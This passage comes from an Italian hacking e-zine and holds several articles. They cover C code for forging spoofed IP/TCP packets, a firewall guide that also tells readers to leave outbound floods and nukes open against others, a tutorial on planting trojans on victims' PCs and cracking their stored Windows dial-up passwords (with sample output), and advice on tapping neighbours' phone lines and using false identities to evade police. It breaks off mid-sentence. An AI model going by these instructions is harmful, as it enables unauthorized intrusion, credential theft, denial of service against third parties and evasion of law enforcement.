case default: exit(1); break;
}
sp_help_ip = (struct ipheader *)sp->buffer;
sp_help_ip->verlen = (IP_VERSION << 4) | (IP_HEADER_BASE+sp->ip_optlen+sp->
tcp_optlen);
sp_help_ip->tos = 0;
sp_help_ip->lenght = htons(IP_HEADER_BASE+HEADER_BASE+sp->ip_optlen+sp->
tcp_optlen+sp->datalen);
sp_help_ip->ID = htons(12545);
sp_help_ip->flageoffset=0;
sp_help_ip->ttl = 69; //miseria! Non deve morire prima del previsto...
sp_help_ip->protocol = protocollo;
sp_help_ip->source = sp_getaddrbyname(sp->source);
sp_help_ip->destination = sp_getaddrbyname(sp->destination);
sp_help_ip->checksum = in_cksum((unsigned short *) (sp->buffer),
IP_HEADER_BASE+sp->ip_optlen);
}

Questa e' per l'ip... e' molto intuitiva, e' inutile che ve la spieghi.
Attenzione, la funzione sp_getaddrbyname(char *) non ve la scrivo, ve la
spiego brevemente: usate un HOSTENT, nel caso in cui l'host debba andare
risolto. Se l'host e' gia' numerico, si verifica l'esistenza e si ritorna il
valore long della medesima. Se invece non e' numerico, tentiamo di risolverlo
e se ci riusciamo si puo' benissimo ritornare il valore long dell'host,
altrimenti si da come risultato 0. Per fixare l'header TCP:

void sp_fix_TCP_packet(struct spdataexchange *sp)
{
char *pseudo_ip_construct[1500];
struct tcpheader *sp_help_tcp;
struct pseudoipheader *sp_help_pseudo_ip;
int i;
for(i=0;i<1500;i++)
pseudo_ip_construct[i]=0;

sp_help_tcp = (struct tcpheader *) (sp->buffer+IP_HEADER_BASE+sp->ip_optlen);
sp_help_pseudo_ip = (struct pseudoipheader *) pseudo_ip_construct;

sp_help_tcp->offset_flags = htons((((TCP_HEADER_BASE+sp->tcp_optlen)/4)<<12)
| sp->flags);
sp_help_tcp->seq = sp->seq;
sp_help_tcp->ack = sp->ack;
sp_help_tcp->source = htons(sp->sourceport);
sp_help_tcp->destination = htons(sp->destinationport);
sp_help_tcp->window = htons(0x7c00);

sp_help_pseudo_ip->source = sp_getaddrbyname(sp->source);
sp_help_pseudo_ip->destination = sp_getaddrbyname(sp->destination);
sp_help_pseudo_ip->zero_byte = 0;
sp_help_pseudo_ip->protocol = TCP;
sp_help_pseudo_ip->TCP_UDP_lenght = htons(sp->datalen+TCP_HEADER_BASE+sp->
tcp_optlen);

memcpy(pseudo_ip_construct+12,sp_help_tcp,sp->datalen+TCP_HEADER_BASE+sp->
optlen);
sp_help_tcp->checksum = in_cksum((unsigned short *)pseudo_ip_construct,
sp->datalen+12+TCP_HEADER_BASE+sp->tcp_optlen);
}


Ecco qua! Ultimo appunto: la in_cksum e' una funzione che potete trovare
dappertutto, anche sul ping.c o su uno dei vari nuker... Non mi dilungo anche
sull'UDP (ma questa e' discriminazione razziale! :)), anche perche'' se
conoscete bene il C (spero, altrimenti che avete fatto, avete letto fin qua
senza capire un c***o???) e' molto intuitiva da realizzare...

Se rimanete nel dubbio, pero', leggetevi i sorgenti di spoofit.h, una libreria
che mi ha ispirato non poco. Non ricordo il nome dell'autore, un attimo...
Ah, si: Bretch Claerhout.

NOTICINA: se non vi va di scrivervi gli header ip, tcp e/o udp a da soli, li
potete semplicemente aggiungere queste righe all'inizio del codice :)

#include <netinet/ip.h> //contiene lo struct per lo header ip
#include <netinet/tcp.h> //contiene quello per il tcp
#include <netinet/udp.h> //e quello per l'udp

ma se ve l'avessi detto prima avreste potuto comprendere come e' formato un
header ip???

I pacchetti IP (il protocollo che si occupa della consegna dei datagrammi)
possiedono un campo che contiene l'indirizzo sorgente ed uno che contiente
l'indirizzo di destinazione. Ai fini del routing solo il secondo dei due
indirizzi ha importanza. E' per questo motivo che in condizioni normali
(mancanza di ACL) e' possibile spedire dei pacchetti IP che "sembrano"
provenire da un qualunque IP. In altre parole, in mancanza di un protocollo di
livello superiore che autentica la sorgente dei pacchetti IP, e' impossibile
essere certi del fatto che l'indirizzo sorgente appartenga effettivamente
all'host che li ha spediti. Immaginate un servizio di rete che utilizza il
protocollo UDP per eseguire operazioni sul server su cui gira, ad esempio lo
shutdown della macchina. Questo fantomatico ed insicuro protocollo (che e'
assolutamente di mia fantasia, ma esempi simili si possono trovare in
applicazioni reali) aspetta un pacchetto UDP contenente il comando "SHUTDOWN"
da un particolare indirizzo, ammettiamo 1.2.3.4: tutti i pacchetti provenienti
da altri indirizzi vengono scartati. Se non fosse possibile praticare l'IP
spoofing solo l'host 1.2.3.4 sarebbe in grado di eseguire lo shutdown su quel
server, di fatto invece chiunque puo' spedire un pacchetto come quello
mostrato sotto.

---------------------------
| (INTESTAZIONE IP) |
| --------- ----------- |
| |1.2.3.4| - |IP SERVER| |
| --------- ----------- |
| |
|...RESTANTE IP HEADER... |
| |
| SHUTDOWN |
---------------------------

L'esempio, anche se di pura fantasia, mostra chiaramente che affidarsi ad una
"trusted-relationship" che si basa sull'indirizzo IP, nel caso di protocolli
non connessi, non e' affatto una buona idea. Quale sarebbe il modo corretto
di disegnare il nostro shutdown-protocoll? Una delle possibilita' e' quella di
cambiare il protocollo in modo che il server, invece di eseguire direttamente
il comando, aspetti un pacchetto UDP contenente la stringa "AUTH". Se il
pacchetto non proviene da uno degli IP autorizzati non si cura la della
richiesta, alrimenti spedisce un pacchetto che contiene un numero
pseudo-casuale al client e si mette in attesa di un comando. Il client dovra'
rispondere con un pacchetto formato dal numero casuale che ha ricevuto dal
server seguito dal comando, ad esempio "2390-SHUTDOWN". Questo protocollo ci
salva dall'IP spoofing (nel caso in cui l'attacker non e' posto fisicamente
tra il server ed il client, altrimenti ha la possibilita' di leggere il numero
randomico e costruire il pacchetto con il comando), ma devono essere prese
opportune precauzioni; il generatore dei numeri pseudocasuali deve essere
"cryptographycally secure", ovvero possedendo una serie di output R1, R2, R3,
RN, l'attacher non deve essere in grado di predire gli elementi successivi
della sequenza (la funzione rand(3) della libc non e' un generatore sicuro, e'
un generatore lineare congruenziale facilmente predicibile).

La seconda condizione e' che il numero pseudo casuale sia abbastanza grande da
non permettere all'attacher di montare un attacco di forza bruta in un tempo
ragionevole. Come gia' detto, questo protocollo ipotizza che l'attacker, anche
se non in grado di spedire pacchetti provenienti dall'indirizzo (ad esempio)
1.2.3.4, non sia in grado di intercettare le risposte che sono dirette
all'host 1.2.3.4 (di solito su internet questo e' vero, sulle reti locali il
discorso e' diverso). E' per questo che solo il client che possiede il giusto
IP sara' in grado di vedere la risposta spedita dal server, contenete il
numero pseudo-casuale.

Con tecniche di IP spoofing si riesce facilmente a falsificare l'indirizzo IP
di una macchina?
In altre parole: Se faccio il traceroute dell'indirizzo finto, dovrei comunque
riuscire a risalire la catena dei router attraversati fino al finto, oppure
risalgo la catena fino all'IP vero?
Si fa il traceroute VERO dell'indirizzo FINTO. In teoria, se i vari routers
avessero un po' di ingegno, non si potrebbe fare neanche spoofing (o quasi).

In pratica puo' succedere questo:

A(F) ---> B ---> C ---> D
/
F ---> E --->--+

A ti manda un pacchetto fingendosi F. B, che controlla la sottorete A, ed in
teoria non dovrebbe veder passare pacchetti DA F verso "NON A", invece passa
questo strano pacchetto "F verso D". Lo stesso fa C, che "dovrebbe" vedere
arrivare i pacchetti di F solo da E (ma C non puo' sapere se F sia anche
collegato o no a B). D si vede arrivare un pacchetto da un certo "F" che
arriva da "C", di cui si fida e che in passato gli ha mandato pacchetti veri
di F.
Un traceroute D-->F rivela: D, C, E, F ... B e A sono rimasti fuori.
E' possibile naturalmente sapere se F stia originando una connessione con
D. A non puo' impedirlo. Pero', sapere che quel pacchetto "F->D" e' spoofato
non ti fa trovare A.

Se volete maggiori informazioni su l'ip spoofing cercate in rete qualcosa del
tipo tcpspoof.txt, oppure sequence_attacks.txt o shimomur.txt.

Nel prossimo numero parleremo di altri tipi di attacchi come l'IP ID attack.

davser@tin.it - http://davser.cjb.net - ICQ 19930061

---Davser---

----------------------------------------------------------------[ HacKinG ]---
===] CONSEAL FIREWALL TUTORIAL ]==============================================
========] Come condurre una vita rilassante in internet [=====================
-----[ WhITeFiRE ]------------------------------------------------------------

Ciao a tutti, questo il primo articolo che scrivo per Ais e ho pensato di
parlare del conseal firewall.
Firewall significa letteralmente muro di fuoco ed è un software per filtrare
le comunicazioni di un computer con la rete (internet) o tra una rete locale
e internet.

Il firewall può agire su tutti i tipi di pacchetti e su tutti i protocolli
(tcp\ip udp\ip ecc. ecc.).
Uno dei principali problemi di chi installa un firewall tipo il conseal è la
configurazione, infatti un firewall non configurato o configurato male non
conclude niente!

Ma adesso basta teoria andiamo alla pratica.

--[ BREVISSIMO DIZIONARIO

- Rules file o Ruleset file: file che contiene la configurazione del firewall,
ha estensione .fwr
- Onerule o Rule subset: rule che si occupa di un determinato range o di una
determinata porta, ha estensione .fws
- Allow: permettere
- Block: bloccare

--[ COMANDI PRINCIPALI DEL CONSEAL

Nel menu del conseal troviamo le voci:

FILE:
---- Change ruleset file => cambia il file dove sono contenute le rules
(ruleset file)
---- Save ruleset as => salva la ruleset (salva con nome)
---- Import a rule subset => importa una onerule o rule subset

RULES: (contiene le impostazioni del ruleset file)

- CONTROL

-- Firewall state:

---- firewall up: attiva il firewall e comincia a filtrare i pacchetti (in
base alle rules)
---- logging on: attiva il logging nella finestra principale del firewall

------------------------- Nota per i decerebrati -----------------------------

Logging e' l'atto di registrare qualcosa in appositi file detti log

--------------------- fine della Nota per i decerebrati ----------------------

---- Start in system tray: all' avvio di windows troverete l'icona del
firewall vicio all' orologio nella barra di avvio (faccio pena eh?)

-- Ruleset scope

---- one for all network devices: una rules valida sia per le connessioni via
modem che per una rete locale tipo ethernet
---- Separate ruleset for each device: il contrario

-- Ruleset usage (Lasciate su always che e' meglio!)

-- Password
Inutile dire che quì fissate la password senza la quale non potete accedere al
ruleset file, se non barrate la casella password non ne avrete bisogno.

-- Restore default ruleset: ndovina m'pò (vi riporta il ruleset file a quello
di default, sigh :-* tanto lavoro per nulla

- ALL NETWORK DEVICES

---- off: il firewall non aggiunge automaticamente alcuna rule' ce dovete
pensà voi
---- checked: il firewall vi chiede se permettere o bloccare i pacchetti e le
connessioni nell' istante in cui vengono rilevate
---- unchecked: aggiunge automaticamente nuove rule nell' istante in cui
vengono rilevate, però permette qualsiasi connessione

---- add: aggiunge una rule
---- edit: edita una rule
---- delete: cancella una rule

---- advanced: consente di bloccare o rendere liberi tutti i protocolli tranne
tcp, udp, icmp, ip, arp e rarp.

--[ CONFIGURAZIONE DELLE RULES

Il firewall ci deve servire per:

1 Bloccare le porte di default dei trojan + comuni
2 Bloccare attachhi tipo Land o altri attacchi che vogliono far collegare il
nostro pc a se stesso crashandolo
3 Bloccare gli ICMP Flood (tanto usati in IRC)
4 Bloccare i nuke (idem sopra) e permettere solo quelli in uscita che ci
consentono di nukkare il lamer di turno
5 Bloccare il Netbios (se naturalmente non lo usiamo)
6 Permettere i ping ma anche gli icmp flood (verso gli altri) e le risposte

...ed altro che vedremo in seguito

1) Bloccare le porte di defult dei trojan + comuni:
1234, 31337, 27374, 12345, 12346, 20034 ecc ecc
per ogni porta dobbiamo creare una rule in questo modo
(come esempio prenderò subseven 27374)

Rules => All network devices => add

Nella prima schermata scrivete solo la descrizione della rule
(es. blocca subseven) e non toccate + niente quindi
=> NEXT o AVANTI

SERVICE: indica il tipo di servizio icq, pop, http, dns...
...ma siccome dobbiamo bloccare la porta di un semplice trojan non lo
tocchiamo

=> Protocol (subseven adopera il tcp\ip quindi selezionare il tcp\ip)(per bo
invece due rule diverse una su tcp e l' altra su udp)
=> Direction Inbound (entrata) e outbound (uscita), in questo caso tutti e due
=> Priority (priorità) minore è il numero maggiore è la priorità, per le
normali rule va bene 100 (il firewall verifica prima quelle con priorità +
alta e quindi con numero minore poi se tutto va bene passa a quelle con
priorità minori)
=> on match --- qui è possibile scegliere se bloccare (block) o lasciare
libere (allow) la porta o il range di porte. Potete anche bloccare i
frammenti, usati in attacchi come bonk, boink, teardrop. Tenete presente
che il protocollo tcp non frammenta mai, l'udp quasi mai e l'icmp
=> avanti => adesso scegliete l'indirizzo remoto in questo caso tutti
(255.255.255.255 con mask 0.0.0.0) e la porta ( in questo caso 27374 to
27374) dopo inserite l'indirizzo locale
(127.0.0.1 con mask 255.255.255.255).
=> Selezionate solo always e poi

=====>>>> FINE

Ora vi chiederete ma che abbiamo fatto?? Si lo so è un po' frastagliato ma
dopo aver sbattuto un paio di volte la testa a muro sono sicuro che lo
capirete =)).

In pratica abbiamo creato una rule che blocca tutto ciò che entra ed esce
(tramite il protocollo tcp\ip) da tutti gli indirizzi remoti (255.255.255.255
con mask ......) al nostro indirizzo (quello locale 127.0.0.1 con mask ......)
tutto questo vale sempre (always (ultima schermata) ).

Adesso voi creerete tante rules identiche per tutte le porte di default dei
trojan + comuni (attenzione ai protocolli il bo lavora sia su udp che tcp
quindi 2 rule).

Inutile dire che se usate un determinato trojan non dovete bloccare la sua
porta di default altrimenti non funzikerà. :)

Punto 2: Bloccare gli attacchi land.
Per fare ciò non dovete fare altro che fare una rule che blocchi entrata e
uscita per tutte le porte dal vostro indirizzo
(127.0.0.1 con mask 255.255.255.255) verso il vostro indirizzo (127.0.0.1 con
mask 255.255.255.255) e alla fine sempre always; quindi per questa rule nella
casella remote (sia address che mask) e nella casella local (sia address che
mask) ci va il vostro indirizzo locale, non mi chiedete qual' è perché in
queste ultime 4 righe ve l'ho detto già 2 volte. :)

Punto 3: Bloccare icmp icmp flood.
Stessa solfa dei trojan solo che dovete cambiare il protocollo da tcp\ip a
icmp\ip e le porte non saranno + da 0 a 65535 ma da 0 a 255, indirizzo remoto
il solito (255.255.255.255 con mask ......) e indirizzo locale il vostro
(127.0.0.1 mask ......) il tutto con priorità 200
=> always e poi => fine

ATTENZIONE SE VOLETE USARE L'ICMP FLOOD DOVETE BLOCCARE SOLO LE ENTRATE.

Punto 4: Bloccare i nuke.
Stessa cosa dei trojan ma qui in remote tutti gli indirizzi e tutte le porte
in locale invece il vostro indirizzo ma solo la porta 139 [139 to 139] (135
se avete win nt) ,protocollo tcp\ip, bloccare solo l' entrata se volete
nukkare qualcuno, poi sempre always e fine.

Punto 5: Bloccare il netbios.
La rule è la stessa di sopra perché il netbios usa la 139 ma se volete potete
bloccare anche le porte dalla 137 alla 138.

Punto 6: permettere i ping ma anche gli icmp flood
Per questo create una rule con priorità 90 che permetta (allow) per il
protocollo icmp\ip tutte le uscite (outbound) dal vostro indirizzo (che va
sempre nella casella local) a tutti quelli remoti (che vanno nella casella
remote).Questa rule permetterà i ping e i flood, ma per ricevere le risposte
dei ping?

Semplice un' altra rule per il protocollo icmp\ip che permetta entrata e
uscita con priorità 100 da tutti gli indirizzi remoti e tutte le porte icmp
(0 to 255) al vostro computer SOLO PER LA PORTA 8 la ping-reply, quindi nel
riquadro local dove dice types scriverete 8 to 8
=> avanti => solo always e poi => fine

Punto 7 Azz non esiste nessun punto 7 :) hihihihi

------------------------------------------------------------------------------
--------[ ADVANCED ]----------------------------------------------------------
------------------------------------------------------------------------------

Se non avete capito la prima parte non continuate.
Ecco alcune evolutions che si possono fare con il conseal:

1 lasciare libera la porta del netbus se netbuster è attivo in memoria e
bloccarla se netbuster non è attivo

Il netbuster si mette in ascolto sulla porta 12345 quindi nella nostre rule
invece che bloccare la 12345 la lasceremo libera [allow] e nell'ultima
finestra (dove finora avete messo solo always) alla voce "When runnig"
scriverete il pecorso del netbuster (c:\netbuster\netbuster.exe) capito??? e
poi fine (always si deselezionerà automaticamente).Dopo create una rule con
priorità 200 che blokkerà la porta 12345.

Il Firewall procederà così:

1) controlla la rule del netbuster (priorità maggiore) e se non apre la porta
(quindi non trova netbuster attivo) passa a quella con priorità minore e
blocca la 12345

2) TROVARE GLI IP CON CONSEAL PC FIREWALL

eh si avete letto bene siete in irc e non siete op, potete trovare l'ip di
qualcuno, basta che questo abbia uno script che controlli le porte comuni di
tutti i trojan, che vi faccia un ping flood o un nuke (che voi blokkerete)
infatti il firewall vi dirà in una piccola schermata:
remote machine ip.del.lam.er wants to connect to you on port 12345
(o qualsiasi altra porta di un trojan, porta icmp o 139, ecc ecc) e voi
naturalmente clikkkerete su block e lui non entrerà. Visto avete l'ip.

Però il firewall vi chiederà questo per ogni connessione e quindi per i ping,
per visitare siti web ecc ecc e con tutto quello che farete nella rete.
Quindi riceverete molto spesso queste schermate e perciò vi consiglio se non
siete molto esperti di crearvi la vostra rule e settare il firewall a off.

Ma non è finita Leggete il punto 3 (gngngngn)

3) Crashare il conseal

E' possibile anche crashare un firewall settato in modalità checked o in
logging on, infatti se una persona apre tante connessioni ogni volta con ip e
porta diversi con l'host che ha il conseal (settato in modalità checked o con
il loggig on abilitato) questo crasherà perché non riuscirà + a controllare
tutte le connessioni e le rules che andrà aggiungendo ad ogni richiesta di
connessione.
Lo script che fa ciò (linux Source) lo trovate tra i file di ais3 (ccrash.zip)

Spero che l'articolo vi sia piaciuto e vi sia sembrato utile, per qualsiasi
problema potete trovarmi in irc.tin.it sul canale #aisprod o mailarmi
all'indirizzo fausu@libero.it, se riscontrate errori (concettuali non
grammaticali) nel testo mailatemi per correggerli.

:saluti

Saluti mega: a Oldiron e tutta la ais crew che ci permettono di scrivere
e soprattutto leggere questa fantastica rivista.

Saluti normal: al mio amico cicciomix, quando la smetterai di usare quello
stupido trojan e comincierai a darti alle cose + serie?

Saluti Fuck: alla mia prof di matematica (gngngngngn)

ByeZ a tutti

---WhITeFiRE---

---------------------------------------------------------------[ HacKinG? ]---
===] TROJAN?? SI, GRAZIE! -4 REALLY NEWBIES- ]================================
-----[ Dmaster ]--------------------------------------------------------------


-->CONSUMO<--
1 lattina di 7up
2 panini
1 ragazza nuda (molto utile nei momenti di noia...hihihi)

-->SALUTI<--
Ninj@net(Pirl@net x gli amici) - VanadiuM(metà uomo, metà SoftICE) - Light -
Kham - Dibdo

-->DISCLAIMER<--
Tutte le informazioni riportate in questo articolo sono ritenute a scopo
puramente informativo,
né io, né nessun altro sulla faccia della terra (oltre si) sono responsabili
di danni causati dall'uso delle nozioni sotto riportate.

-->COMINCIAMO<--
Ciao a tutti!
Molti newbies che come me si stanno avvicinando al mondo dell'hacking hanno
sentito parlare di trojan, ma cosa sono in realtà questi piccoli software o
come alcuni li definiscono piccoli cavalli di Troia??? I trojan non sono altro
che piccoli programmini che una volta installati sul PC di qualcuno possono
darti il controllo assoluto di questo PC con una semplice connessione a
internet.

Un trojan è formato da due parti: il CLIENT e il SERVER.
Il SERVER è il software che va installato sul PC della vittima, mentre il
CLIENT è il programma che vi permetterà di connettervi al computer da voi
infettato conoscendo semplicemente l'IP della vittima.

-->TROVARE IP DI QUALCUNO<--
Trovare IP di qualcuno può risultare + easy(facile x gli ignoranti) di quanto
può sembrare.
Le tecniche più diffuse x conoscere questo codice magico so

  
no varie, se la
vostra vittima è su ICQ basta vedere sulle informazioni dell'utente, mentre
se si trova su IRC basta digitare:

/dns <nick della vittima>

Spesso IP ottenuto con le tecniche sopra riportate non è completo, x rimediare
a questo problema molti trojan sono dotati di scanner che vi permettono di
trovare le cifre mancanti dell'IP che state cercando. Comunque x gli sfaticati
che vogliono ottenere tutto in maniera + semplice c'è da dire che molti nuovi
trojan hanno un'opzione che permette di mandare, quando la vittima si connette
a internet, un e-mail con il suo codice IP!!! Se si usa questa opzione io
consiglio di farsi mandare l'e-mail in una casella elettronica poco usata,
xchè i trojan memorizzano il vostro indirizzo e-mail in un file *.log o nel
file del server stesso, in questo modo se la vittima è esperta e scopre il
trojan nascosto nel suo PC, con un comune decompilatore potrebbe conoscere il
vostro indirizzo e-mail portando a conseguenze poco piacevoli (lascio a voi
immaginare).

-->USI E RIUSI DEI TROJAN<--
Esistono una marea di trojan, e ogni giorno ne compare uno nuovo, ma i +
famosi sono:

Back Orifice, NetBus, Donald Dick, SubSeven, DeepThroat, Girl Friend,
TCommando...

Ora che sapete come è composto un trojan, vi chiederete, ma come funziona un
trojan? (se non ve lo chiedete è meglio che leggiate altro, PlayBoy ad
esempio, hihihi) Quando avrete installato il server sul computer della vostra
vittima esso aprirà una porta sul computer remoto che aspetterà una
connessione da parte del client.

La maggior parte dei trojan modificano il registro di Windows o il file
win.ini in modo da poterli far partire ad ogni accensione del PC. Io
consiglio ogni tanto di dare un'occhiata al vostro registro di sistema e al
file win.ini x evitare spiacevoli sorprese. Un'altra tecnica (se cosi si può
definire) x sapere se si hanno delle porte aperte è andare in prompt MS-DOS e
digitate 'netstat -a' (senza ').

Le opportunità che vi offre un trojan sono tante: scaricare file, modificare
il registro di Win, scoprire numeri di carte di credito.

Usare queste opzioni è facile e intuitivo, quindi passo a spiegarvi qualcosa
di meno intuitivo ma di molto utile, scoprire le password di Windows (anche
quelle degli account ad internet ;-)).

Per trovare queste password, una volta scelto il trojan da usare è averlo
settato ed installato con una scusa sul computer della vostra vittima,
connettetevi alla porta aperta dal vostro alleato e scaricate dal PC infettato
il file file SYSTEM.INI, apritelo con un editor di testo (Blocco note va
benissimo), e cercate la voce [PASSWORD LIST], una volta trovata questa voce
vi troverete davanti qualcosa del genere:

[PASSWORD LIST]
MATTIALAUS = C:\WINDOWS\MATTIALAUS.PWL

A questo punto scaricatevi il file .PWL indicato e crakkatelo con un software
di CRAKING PASSWORD WINDOWS (Consiglio: PWL's Hackers) e dovreste ottenere
qualcosa del genere:

(C) 21-Nov-2000 by AutoreSoftware "PWL's Hacker" v4.64 (1997,98,99)

Enter the .PWL owned User Name: MATTIALAUS
Enter the User Password:
File 'MATTIALAUS.PWL' has size 796 bytes, version [W95osr2_Win98]
for user 'MATTIALAUS' with password '' contains:

-[Type]-[The resource location string]--------------[Password]-
Dial *Rna\libero\mattia matto84
Dial *Rna\infinito\laus dj84
---------------------------------------------------------------
* Indexed Entryes: 1; Number of resources: 2.

Ed ecco a voi le password da poter sfruttare. Ora capite xchè dico che i
trojan non sono software solo x lamer? Ultimo consiglio che vi do, xchè sono
le 04:00 a.m. e domani ricomincia (purtroppo) la scuola :-(, è quando
impostate il server da dare alla vostra vittima non lasciate mai la porta
di connessione standard del trojan xchè si potrebbe risalire subito alla sua
presenza e al suo tipo.

Queste sotto riportate sono alcune delle porte standard dei trojan + diffusi:

|------------------------|-----|
|TROJAN |PORTA|
|------------------------|-----|
|NetBus 1.x |12345|
|NetBus Pro |20034|
|BackOrifice |31337|
|WinCrash |4092 |
|IcqTrojan |4950 |
|Ripper |2023 |
|Quebus 1.0b |65842|
|Blade Runner 2.x |5402 |
|------------------------|-----|

Comunque potete trovare una lista completa sulle porte standard dei trojan al
sito:

http://valvoline.cjb.net/

Ciao...e alla prossima!!!

P.S.
Essendo uno dei miei primi articoli da quando ho iniziato a voler diventare
(si spera) hacker, sono ben accettate critiche, suggerimenti...il mio
indirizzo e-mail è: dmaster@infinito.it

Potete anche trovarmi su IRC sul canale #cisco (IRC Server: chat.parsec.it).
Ciauz!!!

P.P.S.S.
Non usate mai i trojan x arrecare danni alla gente (eccetto chi vi sta sugli
zebedei) altrimenti sarete solo sporchi lammeroni!!

<<Provoces the best you will die like a slave>>

---Dmaster---

----------------------------------------------------------------[ HacKinG ]---
===] SFRUTTARE UNA SHELL 4 NEWBIES ]==========================================
-----[ Falcon ]---------------------------------------------------------------

Bene, mi presento.
Mi chiamo Falcon sono nuovo nella E-zine, mi Š stata data l'opportunit… da
Oldiron di scrivere in Anarchy in The System e devo dire quando glielo ho
chiesto sono stato felice di avere avuto da lui una risposta positiva.

Ho 2x anni, navigo in irc e in generale su internet da 13 anni circa, sono
passato subito ai cosiddetti sotterranei di internet perch‚ li trovavo molto
pi— interessanti rispetto al classico http://www.cazzate.com.

Qui ho potuto conoscere molte persone, dapprima ero su dalnet dove ho avuto
la possibilit… di entrare in Warezpower e l persone come Guardian,
Infiltrat mi hanno aiutato molto a crescere diciamo in campo internettiano
.
Poi sono passato a undernet nel mitico canale warezitalia l ho conosciuto
ramlin che mi fece la proposta di creare un gruppo, poi purtroppo non se ne
fece niente per vari motivi.
Bhe credo che vi siete proprio rotti di saperne di me, ok Š meglio passare al
mio primo articolo, anche se credo che gi… molti di voi sappiano come
utilizzare una shell quindi non mi riempite di email piene di insulti.
GRAZIE.

La Shell Š un accesso via telnet ad un sistema based-UNIX o meglio Linux che
dispone di linee ad alta velocit… (non sempre purtroppo) e se siete fortunati
una grande capienza dati.
Grazie alla SHELL potete utilizzare qualsiasi comando compatibile con il
sistema operativo della macchina remota che vi offre il servizio, divertente
non credete?;)
Molte volte le shell che si trovano nella rete non sono molto stabili,
presentato dei quote bassi e le linee soprattutto quelle italiane (qui
ringrazio in particolar modo mamma TELEKOM) presentano una lentezza
esasperante.

Quindi la cosa principale da fare Š trovare delle shell stabili almeno 4 mesi
e no quote cioŠ senza limitazioni di spazio.

Ora per quanto concerne il collegamento ne esistono vari tipi, di seguito vi
elenco i principali:

64k velocit… al quanto bassa
128K velocit… al quanto bassa
ISDN velocit… al quanto bassa non pi— di 5k se vi va bene
256k velocit… normali
512k velocit… normali
T1 velocit… elevata circa 2MB/sec
T3 velocit… elevatissima pari a 43MB/sec dette anche stellari
(ah se ne trovate una siate gentili il mio indizzo e-mail Š
alla fine del doc, grazie.:)

Una volta ottenuta la shell dovete per prima cosa verificare la tipologia;
controllare che il login e la password facciano il loro dovere e dopo cambiare
immediatamente la password cos evitate che altri si possono impadronire
della vostra shell.

Per cambiare la password dove utilizzare il comando "passwd" ed eseguire tutto
quello che vi appare a video; poi verificate se la shell Š noquote o quote.

Per fare ci• digitate quote, se non vi appare nulla BINGO vuol dire che avete
a disposizione tutto lo spazio altrimenti vi replicher… con dei numeri.

Per verificare invece la velocit… della connessione della shell qui la
questione non Š semplice nel senso che dovete essere voi a testarla con
trasferimenti ftp in modo da constatare se il flusso dei dati Š costante
oppure o no.

In linea di massimo una linea T1 riesce al massimo a raggiungere velocit…
pari a 40Kb/sec di trasferimento mentre una T3 pu• raggiungere anche punte di
100Kb/sec

Una volta dentro potete utilizzare alcuni programmini interessanti che spero
conosciate bene :), su scherzavo dai.

I tre programmi principali che si possono utilizzare in un SHEEL ACCOUNT sono:

FTP - Telnet - Irc.

Iniziamo dall'FTP.
Supponiamo che vi dovete collegare al sito tuttiiprogrammidelmondo.com e
prelevare tutta directory /Gamez, come fare...

1. entrate nella shell;
2. createvi una directory con il comando mkdir;
3. eseguite l'fpt con il seguente comando ftp -i tuttiiprogrammidelmondo.com;
4. immettere la login e la password entrando nell'FTP;
5. settate subito il trasferimento binario con il comando binary;
6. entrate nella directory /Gamez;
7. eseguite il comando per prelevare tutti i files: mget *.*

Una volta eseguiti questi comandi digitale logout in modo da evitare che la
connessione venga tranciata. A questo punto potete pure scollegarvi e
ricollegarvi l'indomani nella vostra shell con tutta la dir /Gamez piena dei
vostri giochini.:)

Per quanto riguarda telnet non c'Š niente da dire .. potete utilizzare tutti
i comandi unix o linux che volete:)) quindi a voi la scelta di smanettare con
i comandi giusti.

Per irc invece permette di fare molte cose come installare un semplice bot
che vi tenga un canale. Ma questo se mi sar… permesso di scrivere ancora vi
spiegher• come istallare un bot.

Spero di essere stato chiario e semplice nella spiegazione comunque se volete
contattarmi la mia email Š falcon@thenavy.com oppure potete trovarmi su
irc.tin.it nel canale #phreak.it

---Falcon---

----------------------------------------------------------------[ HacKinG ]---
===] SICUREZZA PER BAMBINI ]==================================================
-----[ Sash4 ]----------------------------------------------------------------

allora....
pensiamo un po...
sicurezza, vi dice niente il nome???
Questo articolo(articolo poi... manco scrivessi per il times :) sembrerà a
molti l'uovo di Colombo (chi il tenente?.... vabbe gaia...lascia perdere...),
molti anzi tutti, dopo aver letto questa minchiata crederanno di aver perso
tempo prezioso che potevano dedicare ad altro(droga, figa,nutella,europei,
topolino,bucare la nasa, ecc ecc.) forse è cosi', ma non dimenticate che il
coglionazzo che cambio il giornale radio rai inserendo delle proteste contro
Bill fu sgamato(acchiappato) perche' aveva usato un suo login reale per
entrare nel magico mondo di internet.... Quindi fate molta attenzione a come
vi connettete e ad altre piccole cose.

Questo metodo è sicuro al cento per cento( cioe non vi sgameranno mai, a meno
che non ci sia in mezzo veramente la NASA)

LA LINEA TELEFONICA :
Se avete in mente un obbiettivo preciso, gia avete fatto il vostro bel
footprinting, gia sapete il bug da utilizzare (se siete bravi avete gia fatto
il vostro programmino che sfruttera il bug), e soprattutto gia sapete cosa
fare e come, la cosa piu importante è la linea telefonica.

Infatti mamma tel**om saprà esattamente dalla vostra linea di casa in che
anno,mese,giorno, ora, minuti e secondi vi siete collegati a internet (si
spera che non vada sventolando i tabulati in giro, ma cmq se la polizia va a
fare un contollino....).
Cercatevi una linea telefonica non vostra, molte volte nei palazzi, proprio
fuori dalle vostre belle porte c'è in alto uno sportellino con la + classica
delle scritte tel**om. Bene, li ci sono i cavetti telefonici che portano alle
case di tutto il palazzo (sinceramente non c'e nemmeno bisogno del tester,
sono dei cavetti bianchi e rossi, a meno che non sappiate distinguere un
cavetto telefonico da quelli dell'elettricita(in ogni caso non fate cazzate,
se non sapete chiedete)una volta provati i cavetti del tel, basta collegarli
(senza romperli, ma soltando con due coccodrilletti) al modem (se non lo
sapete fare chiedete) e viaggiare.

( Queta soluzione è utile se volte fare dei colpetti del cazzo, altrimenti se
la pula si mette di impegno state tranquilli che vi becca.

100% sicura è la connessione via cabina telefonica o centralina ( da li non vi
beccheranno mai solo dai log di internet) piu difficile è non farsi beccare
dalla pula nella vita reale(cioe nel momento in cui siete fisicamente sulla
cabina o centralina con il vostro bel portatile(ma questi non sono fatti miei)

In tutti e due i casi bisogna fare tutto il più veloce possibile.

L'ABBONAMENTO A INTERNET :
di certo non vi volete fare beccare con le mani nel sacco con il vostro nome e
cognome.... Quindi quando sottoscrivete un abbonamento fatelo con nomi falsi.
Per prima cosa creare il primo collegamento a internet in modo anonimo.
E' molto importante utilizzare o un internet cafe' o un quei login/pass di
